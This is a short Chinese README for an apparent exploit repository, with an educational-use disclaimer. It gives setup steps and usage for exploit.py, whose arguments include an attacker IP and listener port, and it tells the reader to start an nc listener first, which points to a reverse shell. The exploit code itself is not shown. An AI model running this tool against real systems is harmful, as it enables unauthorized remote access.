重要——请先阅读:
本仓库和exploit.py仅用于教育和研究目的。请不要将此代码用于未经明确书面授权的系统、网络或服务。未经授权访问计算机系统是违法且不道德的。使用此代码即表示您同意遵守适用的法律和机构政策。
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <用户名> -p <密码> -i <攻击者IP> -l <监听端口> -url <目标URL> [--proxy]
在运行脚本之前,请确保您已启动 nc 监听器。除非调试,否则不使用代理运行脚本:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
最后提醒: 此脚本和 README 仅供教育用途。切勿使用这些工具非法访问系统。